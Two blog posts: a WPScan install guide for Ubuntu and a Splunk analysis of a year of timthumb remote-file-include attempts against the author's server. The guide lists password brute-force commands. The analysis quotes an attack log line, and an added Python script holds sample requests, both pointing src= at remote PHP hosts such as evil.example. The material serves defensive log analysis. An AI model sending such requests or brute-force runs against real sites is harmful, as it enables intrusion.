WPScan Install on Ubuntu
https://hackertarget.com/wpscan-install-ubuntu/
HackerTarget.com, Wed, 06 Nov 2013

WPScan project page

WPScan can test a WordPress installation for security vulnerabilities. It is a black box scanner, so it tests a WordPress installation remotely without access to the server. It can find vulnerable plugins and themes, identify security configuration issues and attack users by brute forcing passwords.

Installation on Ubuntu Linux is straightforward and you will be up and running in a few minutes. Alternatively, you could try Kali Linux, a pre-built penetration testing Linux distribution that comes with WPScan pre-installed.

Install Steps for WPScan on Ubuntu

If you do not have git installed, you will need it. Git gives you easy access to the code repository, both for the initial installation and for later updates.

sudo apt-get install git

Now for a few prerequisites.

sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev

Now use git to clone the main branch of the WPScan code. This creates a folder on your system containing the code; change into it and install the Ruby gems WPScan depends on with bundler.

git clone https://github.com/wpscanteam/wpscan.git

cd wpscan

sudo gem install bundler && bundle install --without test development

To run WPScan, launch wpscan.rb with ruby. Run without arguments, it prints the usage examples:

ruby wpscan.rb
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                    Version v2.1r2d5a770
     Sponsored by the RandomStorm Open Source Initiative
 @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
_______________________________________________________________


Examples :

-Further help ...
ruby wpscan.rb --help

-Do 'non-intrusive' checks ...
ruby wpscan.rb --url www.example.com

-Do wordlist password brute force on enumerated users using 50 threads ...
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

-Do wordlist password brute force on the 'admin' username only ...
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

-Enumerate installed plugins ...
ruby wpscan.rb --url www.example.com --enumerate p

-Enumerate installed themes ...
ruby wpscan.rb --url www.example.com --enumerate t

-Enumerate users ...
ruby wpscan.rb --url www.example.com --enumerate u

-Enumerate installed timthumbs ...
ruby wpscan.rb --url www.example.com --enumerate tt

-Use a HTTP proxy ...
ruby wpscan.rb --url www.example.com --proxy 127.0.0.1:8118

-Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)
ruby wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000

-Use custom content directory ...
ruby wpscan.rb -u www.example.com --wp-content-dir custom-content

-Use custom plugins directory ...
ruby wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins

-Update ...
ruby wpscan.rb --update

-Debug output ...
ruby wpscan.rb --url www.example.com --debug-output 2>debug.log

See README for further information.

No argument supplied

Like any vulnerability scanner that relies on signatures or known issues for detection, WPScan needs to be updated on a regular basis. Thankfully the WPScan team update it frequently.

Update WPScan

To update simply launch a git pull command from within the installation directory.

cd wpscan
git pull

There are no WordPress Timthumb Hackers in Mongolia
https://hackertarget.com/feed-splunk-timthumb-attacks/
HackerTarget.com, Thu, 07 Feb 2013

What is Timthumb?

Back in August 2011, a serious vulnerability was discovered in many popular WordPress themes and plugins. The affected code, timthumb, generated thumbnails automatically when publishing with the WordPress content management system. While not part of the WordPress core, the code had been reused by many developers, including both commercial and free theme builders.

The critical vulnerability is a remote file include (RFI): an attacker can make the timthumb code include a file from a remote URL, and the web server then executes that file as PHP. Attackers use this vulnerability to execute commands on the web server.

So widespread was the vulnerability that attackers have been compromising WordPress installations for the past 18 months and continue to do so. Just yesterday, my OSSEC host-based intrusion detection system alerted me to continued attempts to exploit the timthumb vulnerability.

Example

Below is an attack example from my logs. Note the WordPress path being attempted, the theme name, and the ?src= parameter, whose value is the URL of the remote PHP code to be included.

61.246.x.x - - [02/Feb/2013:18:33:28 +0000] "GET /wordpress-themes-in-top-1-million-websites/wp-content/themes/suffusion/timthumb.php?src=http://picasa.com.c        t.ro/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"

Anyone who has patched the vulnerability with updated code is not affected by these ongoing attempts. They simply fill your web server log files with requests for thumb.php on various common paths, each resulting in a 404 not found error.

What is Splunk?

If your job involves looking at logs, spend some cycles playing with the Splunk search engine. It is a commercial product but comes in a free version that allows you to index 500 MB of logs per day, which is great for ad-hoc analysis or small to mid-size projects.

To perform some simple analysis of my web server logs and view the frequency, sources and nature of the attempts to exploit this timthumb vulnerability, I turned to Splunk.

Feeding Splunk a year of Timthumb Attacks

Timthumb Events per month over 1 year

To begin, I installed Splunk and fed it a single file containing 12 months of logs from my Nginx web server. I used grep to keep only the log entries that included thumb in the path and resulted in a 404 not found. In other words, every event in my Splunk instance is a single attempt to exploit the timthumb vulnerability.

Since the data in my Splunk instance is only made up of timthumb exploit attempts, the initial search string shows all the attempts per month over the 12 months.

source="/home/fred/nginx-logs/access-complete-thumb.txt"

It is clear from this simple query that even though the initial vulnerability was disclosed in August 2011, there was a major jump in the number of attacks against my server from July 2012. The increase appears to be due to longer lists of tested timthumb paths (more known bad themes) being included in the attack scripts.

Where did the attacks come from?

Using the Splunk GeoIP app it is a simple matter to determine where the attacks are coming from. Once the base lookup is working, Splunk makes it easy to chart the top countries or cities.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | lookup geoip clientip | top 20 client_country

This query shows the top 20 countries by total number of attacks.

Since some of these IP addresses are sending thousands of attempts, I take a closer look at the number of unique IP addresses by location. Instead of a simple chart, I use the Google Maps app, which plots the geolocations onto a Google Map. Using a map takes this visualization to the next level. A great way to impress the boss with a couple of clicks!

From a quick look at the map it is apparent that there are no timthumb hackers in Mongolia.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | stats count by clientip | geoip clientip

Top attacking IP Addresses

Piping the search into top 20 clientip shows the top attacking IP address as 178.25.214.92 with 2445 events. Click on the IP address and it is easy to see that all attempts from this IP occurred during an 8 minute window on the 30th of August 2012. Whois shows this IP address is a broadband connection in Germany.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | top 20 clientip

source="/home/fred/nginx-logs/access-complete-thumb.txt" clientip="178.25.214.92"

Most Attacked WordPress Themes

To extract the most popular themes being attacked I used a regex on /wp-content/themes/ to capture the theme name from the path into a wptheme field. Many of the attacked themes in the top 20 correlate with the most popular WordPress themes in the Top 1 million websites.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | rex field=_raw "wp-content\/themes\/(?<wptheme>[\w\-]*)" | top 20 wptheme

Looking at the most attacked WordPress themes, I discovered some attacks were not "blind" attempts. They were targeted at my theme, which lives on a non-standard path. This indicates my site was explicitly targeted, either manually after extracting the path from the HTML source of my page or by a script parsing the HTML for it. 31 different IP addresses had a go at my non-default theme path. In the top 5, I found 3 web hosting net blocks (Sweden, Germany and the USA), a Greek university and two Tor exit nodes.

source="/home/fred/nginx-logs/access-complete-thumb.txt" uri_path="/wp-content/themes/delegate2.3/functions/thumb.php" | top clientip
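The same analysis can be reproduced without Splunk over a plain log file. The following is an added example, not code from the original post: a small Python script that applies the post's grep filter (thumb in the path, 404 response), the per-month count, the top clientip and theme reports, and the check for sources hitting one specific non-default theme path, over a handful of constructed combined-format log lines (the IPs, hostnames and paths in SAMPLE_LOG are made up).

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample lines in nginx/Apache combined log format, modelled on
# the entry shown in the post; IPs, hosts and paths are made up.
SAMPLE_LOG = """\
61.246.1.1 - - [02/Feb/2013:18:33:28 +0000] "GET /blog/wp-content/themes/suffusion/timthumb.php?src=http://evil.example/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0"
61.246.1.1 - - [02/Feb/2013:18:33:29 +0000] "GET /blog/wp-content/themes/twentyten/timthumb.php?src=http://evil.example/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Aug/2012:10:01:02 +0000] "GET /wp-content/themes/delegate2.3/functions/thumb.php?src=http://evil.example/x.php HTTP/1.1" 404 36 "-" "curl/7.2"
203.0.113.9 - - [30/Aug/2012:10:05:44 +0000] "GET /wp-content/themes/delegate2.3/functions/thumb.php?src=http://evil.example/x.php HTTP/1.1" 404 36 "-" "curl/7.2"
203.0.113.9 - - [30/Aug/2012:10:05:45 +0000] "GET /wp-content/themes/suffusion/timthumb.php?src=http://evil.example/x.php HTTP/1.1" 404 36 "-" "curl/7.2"
192.0.2.5 - - [01/Sep/2012:08:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<clientip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Same capture the post's Splunk rex uses to pull the theme slug out of the URI
THEME_RE = re.compile(r"wp-content/themes/(?P<wptheme>[\w\-]*)")

def parse(log_text):
    """Yield one dict per line that parses; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()

def timthumb_attempts(log_text):
    """The post's grep filter: 'thumb' in the request path and a 404 response."""
    return [e for e in parse(log_text)
            if "thumb" in e["uri"].split("?")[0] and e["status"] == "404"]

def per_month(events):
    """Counter keyed by 'YYYY-MM', the Splunk 'events per month' view."""
    return Counter(datetime.strptime(e["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
                   .strftime("%Y-%m") for e in events)

def top_clientip(events, n=20):
    return Counter(e["clientip"] for e in events).most_common(n)

def top_themes(events, n=20):
    matches = (THEME_RE.search(e["uri"]) for e in events)
    return Counter(m.group("wptheme") for m in matches if m).most_common(n)

def ips_hitting_path(events, uri_path):
    """Unique sources requesting one exact (non-default) path: a sign of a
    targeted probe rather than a blind sweep of common theme names."""
    return sorted({e["clientip"] for e in events
                   if e["uri"].split("?")[0] == uri_path})
```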

I have only scratched the surface of what is possible when using Splunk to analyse your web logs for attacks and other issues. Install it, start playing, and you will not be disappointed. For those wary of the Splunk price tag for larger volumes of data, I suggest taking a look at ELSA and Graylog2. Both are open source log management systems that seem promising and are developing rapidly.
